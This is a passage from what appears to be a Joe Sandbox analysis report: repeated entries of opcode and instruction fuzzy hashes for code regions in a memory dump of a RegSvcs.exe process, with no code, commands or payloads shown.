                                                              • Instruction ID: 4c3e4f3ae58da589689acd0e66e9a0ce77d5d964f2e63558a31c37f2eebed15e
                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                              • Instruction Fuzzy Hash: 6EF09072610205EEE714DF65CC01F56B6E9FF98740F14C468A545DB1A4FAB0DD01C654
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae7b8a48e0687c574ad77719f47bf6de375ab46b27c1ff1a88a37a57f11371a4
                                                              • Instruction ID: 9fa862f2d76f53934eee17a913aa769931317c3fd7549b23c85f6314d1d3483d
                                                              • Opcode Fuzzy Hash: ae7b8a48e0687c574ad77719f47bf6de375ab46b27c1ff1a88a37a57f11371a4
                                                              • Instruction Fuzzy Hash: 6DF0B4339103446BD7317A1CAC54B5BBB6DFBD4724F8D5615F94A2B3258B306C90D780
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c39258056f666818ad8ca7914265b1b3d9fdb20952ff3d48ce7b7d603b6b956
                                                              • Instruction ID: 90b3ef44723d378e3999032160787dba4385fcc98d45d2a54f5932923df70687
                                                              • Opcode Fuzzy Hash: 6c39258056f666818ad8ca7914265b1b3d9fdb20952ff3d48ce7b7d603b6b956
                                                              • Instruction Fuzzy Hash: F6F06270A0124AEFCB14EFA9C915A5EB7B4FF58300F008066B955EB395DA78EA01CB94
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 595138f6757c0a88f0012d15e70dfb387187931e272df8b5e609c0a02175ce52
                                                              • Instruction ID: d09f47e7374f148e87aca9b6f50b7eed0f9673f8156f8289e63557c4e9fd70ca
                                                              • Opcode Fuzzy Hash: 595138f6757c0a88f0012d15e70dfb387187931e272df8b5e609c0a02175ce52
                                                              • Instruction Fuzzy Hash: E6F0B4319166D19FEF32CB5CC654B297BD8FB00630F084D6AD5498F502D724DC82C652
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7643b1d28d5f24657e633881b2a2c7b4598c12dc3a321119a55b38679a8f06d1
                                                              • Instruction ID: 88cf8269244027ba295e7cc29f4b521745a5d63e39bb536dec4c9e5fcb2b58cd
                                                              • Opcode Fuzzy Hash: 7643b1d28d5f24657e633881b2a2c7b4598c12dc3a321119a55b38679a8f06d1
                                                              • Instruction Fuzzy Hash: EDF027264156C12BCF726B6CEC503D53B56A752214F0A2189DDA05B305C674C493C3AA
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 823675eb2c2e550174d758043ca7b5b285f0e76b37ab28020a5468ea3dfb912a
                                                              • Instruction ID: 49d4c569dc1c99abe9edc6e3c43eb6d76c82b8f227f68ad005c634f0bb3a0ae4
                                                              • Opcode Fuzzy Hash: 823675eb2c2e550174d758043ca7b5b285f0e76b37ab28020a5468ea3dfb912a
                                                              • Instruction Fuzzy Hash: A2F0E2725116919FE7229FACC388B297BD8BB40FA0F0CA82DD40ECF512C660E8C0CA50
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction ID: 83f55c39bcd2839006edffd4a93fb3aba2f55ebad65de306170161d1e2635aa4
                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                              • Instruction Fuzzy Hash: A8E092323406022BE7219E5D8C80F47776EAFD2B10F044079B6045E251CAE29C0983A4
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction ID: c590b10926a6b011ebb9bfdb50a7500c063f263b843bb46ca0d4d00809975ab4
                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                              • Instruction Fuzzy Hash: D7F0A0721006149FE3218F09DE40F52B7F8EB05364F41C025EA088B260D37DEC40DFA4
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction ID: fb9945a591913aa498260b12640a9f8965796502984097be0877a5b027982a8a
                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                              • Instruction Fuzzy Hash: A8F0E53A204351DBDF1ACF19D440A9D7BE8FB41360F040854F8468F341E731E981CB95
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                              • Instruction ID: f0614b1097e27d13e36f26bc61e31a781d5d7f917d832d6ad7245e29ea48bdbd
                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                              • Instruction Fuzzy Hash: 0CE09232254146AFD3211E9D8C10F7A77A7BBD0BA0F15042DE2028F150DBB0DC40C798
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                              • Instruction ID: e871e06ed3859508619dd7ff3c6efa906bab7ac56823ec646dd6b30e0c4c4617
                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                              • Instruction Fuzzy Hash: F7E04F72A40115BFDB22A799CD05FAABEBCEBD4EA0F554095B602EB190E570DE00D6A0
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c4ec20401a4f00edc4d3c40b801d16ef5348a1ab8573d48b789ab28d9976608a
                                                              • Instruction ID: 12a40c380665d03385fa02b3dc6404475c3d535ef0a8ab4f8f48619b4813c8ea
                                                              • Opcode Fuzzy Hash: c4ec20401a4f00edc4d3c40b801d16ef5348a1ab8573d48b789ab28d9976608a
                                                              • Instruction Fuzzy Hash: B8E09232100595ABC721BB29DD11F8A77AAFFA1364F014515F1555B190CB70AC50C7C4
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f35e8797dcd1400d38196328e0f96112e49db9770b6fa4dd2bc8eeba1da7b2a
                                                              • Instruction ID: d3050f94d628d1a15d05cdf48969aa9524c8f8b301846272e047fc5d2b938952
                                                              • Opcode Fuzzy Hash: 5f35e8797dcd1400d38196328e0f96112e49db9770b6fa4dd2bc8eeba1da7b2a
                                                              • Instruction Fuzzy Hash: 2E90022961340002D1847258540C60A0085A7D1212F99D815A0015958CC95589695321
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f329883de64499919a32ea63c74c6126f202d58e3fc387b6c6db59be4e64c2a3
                                                              • Instruction ID: 12431e8b94bd8ee59619cd30bf8ce36b6987e2e6759fe86401264aeff35423e5
                                                              • Opcode Fuzzy Hash: f329883de64499919a32ea63c74c6126f202d58e3fc387b6c6db59be4e64c2a3
                                                              • Instruction Fuzzy Hash: 1990022160544442D1047658540CA060085A7D0215F59D411A1064995DC6758951A231
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c2719b3cbf36c9c19091cef01df48aa18c14b089d894eed7efe418973a4d9159
                                                              • Instruction ID: f5b641957c84a6f71eeca6ec0a6b9a32453f44b981fe0e5842c232b7a3f936cc
                                                              • Opcode Fuzzy Hash: c2719b3cbf36c9c19091cef01df48aa18c14b089d894eed7efe418973a4d9159
                                                              • Instruction Fuzzy Hash: B490022170140003D1447258541C6064085F7E1311F59D411E0414954CD95589565322
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88face714ae4c074dc4a6fcd52360478ec455fe1099a00e5ccaf10a9f16c8294
                                                              • Instruction ID: eee8aa38b1b50d98ceb513abc3a2cfef536e50ae0a5fd733f3ddce4c300c70a8
                                                              • Opcode Fuzzy Hash: 88face714ae4c074dc4a6fcd52360478ec455fe1099a00e5ccaf10a9f16c8294
                                                              • Instruction Fuzzy Hash: 14900221642441525549B25844085074086B7E0251799C412A1414D50CC5669956D721
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ae1bd3410b23b27f8be13dd2b9c6e5738374594fcc5712a68d5de6975d1defc
                                                              • Instruction ID: f5214c6576ba2565a4aaf5d28f0990439c2372ff005309227b7f46ad4e5417aa
                                                              • Opcode Fuzzy Hash: 1ae1bd3410b23b27f8be13dd2b9c6e5738374594fcc5712a68d5de6975d1defc
                                                              • Instruction Fuzzy Hash: 2690023164140402D145725844086060089B7D0251F99C412A0424954EC6958B56AB61
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e1f6116b36abdc7e5174ed774286f3754712b9e23ab8a21fde27f0139c3864f
                                                              • Instruction ID: 16eec403e16018cbba7ea28841ca2de9f6e3bdaedf473b1d9bd9ee983e4fde28
                                                              • Opcode Fuzzy Hash: 5e1f6116b36abdc7e5174ed774286f3754712b9e23ab8a21fde27f0139c3864f
                                                              • Instruction Fuzzy Hash: DD90023160140842D10472584408B460085A7E0311F59C416A0124A54DC655C9517621
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 497449447f1b858d238dd84eb72a10fc251b053733db6a584f6cd36bda29311e
                                                              • Instruction ID: 8fe71cd8fe0a065c45b963084c401a1d10288fc83c630cc054f1fe2d6492462a
                                                              • Opcode Fuzzy Hash: 497449447f1b858d238dd84eb72a10fc251b053733db6a584f6cd36bda29311e
                                                              • Instruction Fuzzy Hash: D0900221A0540402D1447258541C7060095A7D0211F59D411A0024954DC6998B5567A1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4a9a8cb150fc455e5f894f0adb2d9f49aef5e084490edd72fe3a5ee048bcf4f3
                                                              • Instruction ID: c1d1f14a7b2012ce0fd7be752339d52f52a6f0c9c9ab9bcc13f7fdf6bee4e8a2
                                                              • Opcode Fuzzy Hash: 4a9a8cb150fc455e5f894f0adb2d9f49aef5e084490edd72fe3a5ee048bcf4f3
                                                              • Instruction Fuzzy Hash: 5490023160140403D1047258550C7070085A7D0211F59D811A0424958DD69689516221
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8ffc84f42d056cc0b72a36485f7f7474db2f0cc67b6840a6b1d846c93593133
                                                              • Instruction ID: d5cd74440a704be4fc878b21c4a42b1f9e17e6b4b4c46a424fd5871842444df1
                                                              • Opcode Fuzzy Hash: e8ffc84f42d056cc0b72a36485f7f7474db2f0cc67b6840a6b1d846c93593133
                                                              • Instruction Fuzzy Hash: 5B90023160140402D1047698540C6460085A7E0311F59D411A5024955EC6A589916231
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 71f7658ccec156499fb6234dfb2de5d133a5373e8e04ce4a8a9b4f3da5dfcd37
                                                              • Instruction ID: 6eab1a12bc8ad2e2615b66330cbf82171f4f02066b81e53d96482d2f65fa4c62
                                                              • Opcode Fuzzy Hash: 71f7658ccec156499fb6234dfb2de5d133a5373e8e04ce4a8a9b4f3da5dfcd37
                                                              • Instruction Fuzzy Hash: 7590026161140042D1087258440870600C5A7E1211F59C412A2154954CC5698D615225
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ce995eacf6b4c0c35c86dbe9ef2af3fc310df65fdb0a794a576175a0da7a4483
                                                              • Instruction ID: b78e8e8ff324cf9dbcd3a4a1f08fb0f1d0d3348591d300edfc8324cec4348ff6
                                                              • Opcode Fuzzy Hash: ce995eacf6b4c0c35c86dbe9ef2af3fc310df65fdb0a794a576175a0da7a4483
                                                              • Instruction Fuzzy Hash: F890026174140442D10472584418B060085E7E1311F59C415E1064954DC659CD526226
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d3cfe15d7cc3a25e7f2fc1f43a5658a1dade396c9f90ee0ff295e8eae71cc6ad
                                                              • Instruction ID: 4629a896096f787e29b9ced9ea2940726aaaf89877a930b0fe5ca6ff5ea2a01a
                                                              • Opcode Fuzzy Hash: d3cfe15d7cc3a25e7f2fc1f43a5658a1dade396c9f90ee0ff295e8eae71cc6ad
                                                              • Instruction Fuzzy Hash: 90900221611C0042D20476684C18B070085A7D0313F59C515A0154954CC95589615621
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b73ca912fd9458ce907a74d88ad4a9419a731ab8c7b3da4ff8cdf23605081fa7
                                                              • Instruction ID: 1bb8e5f5c057e8876e665a347d8c6fe5b0954d6acb0d75dd157969071717b09e
                                                              • Opcode Fuzzy Hash: b73ca912fd9458ce907a74d88ad4a9419a731ab8c7b3da4ff8cdf23605081fa7
                                                              • Instruction Fuzzy Hash: AF90023160180402D1047258481870B0085A7D0312F59C411A1164955DC66589516671
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7482a9b6ce8aa6ef3cc75d775cfd718f085ec4dc1a86e959157fd82397053b58
                                                              • Instruction ID: 13126e730eed9474dac07f22c8ffddf060866756652a52456a96ea34fa4bbab9
                                                              • Opcode Fuzzy Hash: 7482a9b6ce8aa6ef3cc75d775cfd718f085ec4dc1a86e959157fd82397053b58
                                                              • Instruction Fuzzy Hash: F1900221A01400424144726888489064085BBE1221759C521A0998950DC59989655765
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f47f12c0a4de7f85139d83ecd6ae03e63291891d145018124d963b225689d5c3
                                                              • Instruction ID: abfaecb31d27ded898f2dc198357e2c0bf3110baefac1a4995bc3a0ff8df438e
                                                              • Opcode Fuzzy Hash: f47f12c0a4de7f85139d83ecd6ae03e63291891d145018124d963b225689d5c3
                                                              • Instruction Fuzzy Hash: 8590023160180402D1047258480C7470085A7D0312F59C411A5164955EC6A5C9916631
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7ce4f9cd2493b148f848ae5c2a859a4f4ea65995d3b299214f1401a1f193771
                                                              • Instruction ID: d0f760d3a659709de027d33b5a77410c8b655e8830763b12b83b3b23d4ce903a
                                                              • Opcode Fuzzy Hash: e7ce4f9cd2493b148f848ae5c2a859a4f4ea65995d3b299214f1401a1f193771
                                                              • Instruction Fuzzy Hash: 3E90022170140402D106725844186060089E7D1355F99C412E1424955DC6658A53A232
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92db9b83bbf18ea3f6eddb886597e2cf1c6a334dd21056741dd6a35575811274
                                                              • Instruction ID: d7adbcba0e9a8fbfc6a87e84133cd27eca80def3a3cc67819cface29b045b9aa
                                                              • Opcode Fuzzy Hash: 92db9b83bbf18ea3f6eddb886597e2cf1c6a334dd21056741dd6a35575811274
                                                              • Instruction Fuzzy Hash: 5390026160180403D144765848086070085A7D0312F59C411A2064955ECA698D516235
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ecea7384fd756249ad23f788594e76d777e8fadf130a5c4b885355a7d595d867
                                                              • Instruction ID: 29d057ab39bb92cdd35a86d8b03c94b77e9a148133dd738c260234c8b0108f65
                                                              • Opcode Fuzzy Hash: ecea7384fd756249ad23f788594e76d777e8fadf130a5c4b885355a7d595d867
                                                              • Instruction Fuzzy Hash: 90900221A0140502D10572584408616008AA7D0251F99C422A1024955ECA658A92A231
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bc4f4907806136d721d7fa3c68661be19af7c30a1bb64dcb7f80f66371908708
                                                              • Instruction ID: 527b2bb90c8e7c394b00546424f191cf278eddbc0f293f41837fd272af30c0ec
                                                              • Opcode Fuzzy Hash: bc4f4907806136d721d7fa3c68661be19af7c30a1bb64dcb7f80f66371908708
                                                              • Instruction Fuzzy Hash: E890027160140402D144725844087460085A7D0311F59C411A5064954EC6998ED56765
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e1905da10e5895ff83613507b5903f69eda38a0e4087b8c07e58d807fc41fb9
                                                              • Instruction ID: 4dc3d3c0073ed8cb0c2431772cc76f5ee1ca9d8f7a903f26b578bc639acfc31a
                                                              • Opcode Fuzzy Hash: 3e1905da10e5895ff83613507b5903f69eda38a0e4087b8c07e58d807fc41fb9
                                                              • Instruction Fuzzy Hash: A290022160184442D14473584808B0F4185A7E1212F99C419A4156954CC95589555721
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 649da0f443889af2913a3ac93838719f8fe661468e85d540e43584470d12ebdb
                                                              • Instruction ID: 69ad77a13115d089e3f6199c3608b5703c1e450972c8e7acdb108fb93276f408
                                                              • Opcode Fuzzy Hash: 649da0f443889af2913a3ac93838719f8fe661468e85d540e43584470d12ebdb
                                                              • Instruction Fuzzy Hash: BF90022164140802D144725884187070086E7D0611F59C411A0024954DC6568A6567B1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 47d19593e3bc67ab661ff09d50629ce8afebeb6cba7d826b6da7c34762d2974c
                                                              • Instruction ID: 4faadddc6727fd6f5711aaee08636664f3d859198d176a1d4deb48ea4b159a63
                                                              • Opcode Fuzzy Hash: 47d19593e3bc67ab661ff09d50629ce8afebeb6cba7d826b6da7c34762d2974c
                                                              • Instruction Fuzzy Hash: 2890022164545102D154725C44086164085B7E0211F59C421A0814994DC59589556321
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a7a943c25c87eeaa4e6abce30d379b29ecd79bcd9010e78749df2cb818aefbe5
                                                              • Instruction ID: d1d5a9c644c7c2bef3a9778a3c46285d44ac53089c12027f0bba5b6335d82613
                                                              • Opcode Fuzzy Hash: a7a943c25c87eeaa4e6abce30d379b29ecd79bcd9010e78749df2cb818aefbe5
                                                              • Instruction Fuzzy Hash: 2090023560140402D5147258580864600C6A7D0311F59D811A0424958DC69489A1A221
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • Opcode ID: 2ab8c271c863c3ffcff9e517406ffd049b7de69e8017a841861c27f431a17be0
                                                              • Instruction ID: a9ce98f62f8b3cde2e656b803d8bf9b73bf5b96bd5a3f52db84c6eb0ea341389
                                                              • Opcode Fuzzy Hash: 2ab8c271c863c3ffcff9e517406ffd049b7de69e8017a841861c27f431a17be0
                                                              • Instruction Fuzzy Hash: 0B90023160240142954473585808A4E4185A7E1312B99D815A0015954CC95489615321
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: c8a7568f676a18a8ae77a3c6076824ac5f56f67c71ba10dbc3ede338dba9dce1
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              Memory Dump Source
